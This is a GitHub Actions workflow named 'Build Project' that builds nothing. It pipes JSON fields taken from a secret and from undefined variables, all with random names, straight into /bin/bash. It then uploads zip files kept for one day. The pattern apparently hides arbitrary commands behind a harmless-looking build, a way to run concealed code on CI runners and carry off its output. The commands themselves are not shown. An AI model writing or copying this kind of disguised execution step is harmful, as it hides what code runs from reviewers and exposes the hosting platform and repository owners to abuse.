name: Build Project
on:
  workflow_dispatch:

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          ujhvk0: ${{ secrets.ujhvk0 }}
        run: |
          printf '%s' "$ujhvk0" | jq -r .yy015 | /bin/bash
          echo $spolx70 | jq -r .rcox8 | /bin/bash
          printf '%s' "$hboo82519" | jq -r .tvuav531 | /bin/bash
          echo $bgd9 | jq -r .r344 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 8EQPcSn2
          path: "*.zip"
          retention-days: 1
